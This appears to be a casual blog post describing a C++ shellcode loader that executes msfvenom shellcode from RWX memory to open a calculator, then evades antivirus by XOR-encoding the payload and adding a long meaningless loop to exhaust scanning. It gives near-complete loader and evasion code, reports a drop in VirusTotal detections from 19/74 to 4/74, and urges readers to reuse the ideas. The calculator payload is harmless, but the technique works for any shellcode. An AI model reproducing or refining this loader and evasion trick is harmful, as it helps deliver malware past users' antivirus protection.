popping a calc on windows
popping a calc :o
beginnings
i wanted to open a calculator
getting started
so first i create a c++ project and write some code to pop a calc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int main() {
void *exec = VirtualAlloc(
nullptr,
shellcode_size,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
if (exec == NULL) {
return 1;
}
RtlMoveMemory(exec, shellcode, shellcode_size);
((void(*)())exec)();
return 0;
}
oops!
ohno my code no work :(
what happened
- i forgot to specify x64 when making shellcode with msfvenom
- i forgot to add execute to page permissions
this took me about 30-40 minutes in total to fix :)
anyways, defender (obviously) caught it, so what next?
silly stuff
antiviruses aim to provide protection without disrupting user experience, so it cannot spend too much time on one file. if the program contains a lot of loops it’d eat up too much resources or something (read it in some strange document from ages ago)
anyways all i did was add a little loop before my program started (and xored the shellcode)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
int main() {
int a = 0, b = 0;
std::random_device rand;
std::mt19937 gen(rand());
std::uniform_int_distribution<int> rng(0, INT_MAX);
for (int i = 0; i < INT_MAX - 1; i++) {
a++;
}
if (a != INT_MAX - 1) {
return 1;
}
int res;
for (int i = 0; i < INT_MAX - 1; i++) {
b = rng(gen);
res = a ^ b;
a & 0xFFFFFFFF;
}
res = b;
a = res;
xor_decrypt(shellcode, key, shellcode_size, key_size);
void *exec = VirtualAlloc(
nullptr,
shellcode_size,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
if (exec == NULL) {
return 1;
}
RtlMoveMemory(exec, shellcode, shellcode_size);
((void(*)())exec)();
return 0;
}
the loop is completely meaningless, but the antivirus must look at it anyway since it does some operations, which in theory would make it give up on scanning the file
conclusion
my theory must have been pretty close, because i dropped detections from 19/74 to 4/74
while this is nothing special, it was a fun little project to do pre-workout. :D now that it’s on virustotal tho rip this code, please do not be surprised when you try this 6 months later and it gets flagged to oblivion :(
instead, take the ideas here and apply it to your own!!
credits
- thankyou gatari for telling me that i Do Not need to mess with
virtualprotect
- msfvenom for the shellcode
- chat gpt for the xor code